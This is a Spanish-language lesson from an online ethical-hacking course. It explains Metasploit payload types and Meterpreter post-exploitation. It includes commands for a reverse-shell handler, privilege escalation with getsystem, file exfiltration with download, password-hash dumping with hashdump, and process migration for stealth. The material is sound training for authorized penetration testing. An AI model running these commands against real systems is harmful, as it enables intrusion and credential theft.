Payloads y Meterpreter
Shell posterior a la explotación
Payloads y Meterpreter es una lección gratuita de Ethical Hacking Academy en CoddyKit. Esta es la lección 3 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Ethical Hacking Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Ethical Hacking Academy incluye 4 lecciones en total.
¿Qué es un payload?
Un payload es el código que se ejecuta en el objetivo después de que un exploit tiene éxito. Define lo que puede hacer a continuación, desde ejecutar un único comando hasta abrir un shell interactivo completo.
La elección del payload adecuado depende del sistema operativo del objetivo, de la configuración de red y del nivel de acceso que necesite.
Staged frente a stageless
Los payloads se distribuyen de dos formas:
- Staged (observe la
/enmeterpreter/reverse_tcp): envía primero un stub pequeño que después descarga el payload completo. La huella inicial es menor. - Stageless (observe el
_enmeterpreter_reverse_tcp): entrega el payload completo de una sola vez. Es más fiable en redes inestables.
Shells bind frente a reverse
Hay dos direcciones de conexión:
- Bind shell: el objetivo abre un puerto y espera; usted se conecta a él. Los firewalls suelen bloquearlo.
- Reverse shell: el objetivo se conecta de vuelta a usted (LHOST/LPORT). Normalmente atraviesa los firewalls que permiten las conexiones salientes.
Por este motivo, los payloads reverse suelen ser la opción predeterminada.
Conozca Meterpreter
Meterpreter es el payload avanzado de Metasploit. A diferencia de un shell de comandos básico, se ejecuta en memoria, se comunica mediante un canal cifrado y ofrece un amplio conjunto de comandos para la post-explotación.
Como evita escribir en el disco, es más sigiloso que depositar un ejecutable independiente.
Comandos básicos de Meterpreter
Una vez que tenga una sesión de Meterpreter, los comandos fundamentales le permiten orientarse en el objetivo.
sysinfo # OS, architecture, hostname
getuid # current user context
ps # running processes
pwd ls cd # filesystem navigationTransferencia de archivos
Meterpreter mueve archivos entre su equipo y el objetivo mediante comandos sencillos, lo que resulta útil para recopilar evidencias o preparar herramientas en pruebas autorizadas.
download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\Acceso a un shell del sistema
El comando shell le saca de Meterpreter y le lleva al intérprete de comandos nativo del objetivo (cmd.exe o /bin/sh) cuando necesita ejecutar directamente comandos del sistema operativo.
Escriba exit para volver al indicador de Meterpreter sin perder la sesión.
shell
# C:\> whoami
# exit -> back to meterpreterEscalada de privilegios
A menudo obtendrá acceso con privilegios limitados. Meterpreter ayuda a escalarlos:
getsystemintenta técnicas conocidas para obtener SYSTEM en Windows.- El módulo post
local_exploit_suggesterrecomienda exploits de escalada local de privilegios para el host.
Un nivel de privilegios superior permite extraer credenciales y obtener un acceso más profundo.
getsystem
run post/multi/recon/local_exploit_suggesterMigración de procesos
Su sesión vive dentro de un proceso. Si ese proceso es inestable o es probable que se cierre, use migrate para pasar a un proceso más estable y de larga duración y mantener activa la sesión.
Migrar a un proceso que coincida con su nivel de privilegios también ayuda a pasar desapercibido y puede cambiar su contexto de usuario.
ps
migrate 1340 # migrate into a stable PIDMantenimiento del acceso
Meterpreter incluye funciones para capturar datos útiles durante evaluaciones autorizadas, como hashdump para recopilar hashes de contraseñas y herramientas keyscan para demostrar el impacto de la captura de entradas.
Use estas capacidades únicamente dentro del alcance acordado y documente todo en el informe para el cliente.
hashdump
run post/windows/gather/checkvmHandlers
Un payload reverse necesita algo que escuche en su lado para recibir la conexión. El módulo multi/handler es ese receptor. Configúrelo con el mismo payload, LHOST y LPORT que utilizó para generar el payload.
Esto es esencial cuando entrega un payload de msfvenom fuera de la consola: inicie primero el handler y, después, active el payload en el objetivo.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -jComprobación rápida
Elija el payload que atraviesa un firewall restrictivo.
Resumen
Ha aprendido sobre payloads y Meterpreter:
- Los payloads pueden ser staged (/) o stageless (_), y bind o reverse; los reverse suelen atravesar mejor los firewalls.
- Meterpreter se ejecuta en memoria mediante un canal cifrado y ofrece numerosos comandos.
- Tareas básicas: sysinfo, getuid, ps, download/upload, shell.
- Escalade privilegios con getsystem y local_exploit_suggester; use migrate para mejorar la estabilidad.
- Use las funciones de recopilación únicamente dentro del alcance y documente todo.
A continuación: módulos de post-explotación, pivoting y recopilación de datos.
Aprende Ethical Hacking Academy con un tutor de IA — gratis
Escribe y ejecuta código real en tu navegador, obtén ayuda instantánea de un tutor de IA disponible 24/7 y continúa donde lo dejaste en la web o en la aplicación.
- Cursos
- 31
- Lecciones
- 111
Preguntas frecuentes
¿La lección «Payloads y Meterpreter» es gratis?
Sí — el texto completo de «Payloads y Meterpreter» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Ethical Hacking Academy, actualiza a CoddyKit PRO. El curso de Ethical Hacking Academy incluye 4 lecciones en total.
¿Qué aprenderé en «Payloads y Meterpreter»?
Shell posterior a la explotación Practicas Ethical Hacking Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.
¿Necesito experiencia previa para empezar Ethical Hacking Academy?
No se requiere experiencia previa. Ethical Hacking Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 3 de 4.
¿Cuánto tiempo toma la lección «Payloads y Meterpreter»?
La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.
¿Puedo escribir y ejecutar código en esta lección de Ethical Hacking Academy?
Sí. Cada lección de Ethical Hacking Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.
Todas las lecciones de este curso
- Arquitectura de Metasploit
- Búsqueda y uso de exploits
- Payloads y Meterpreter
- Módulos posteriores a la explotación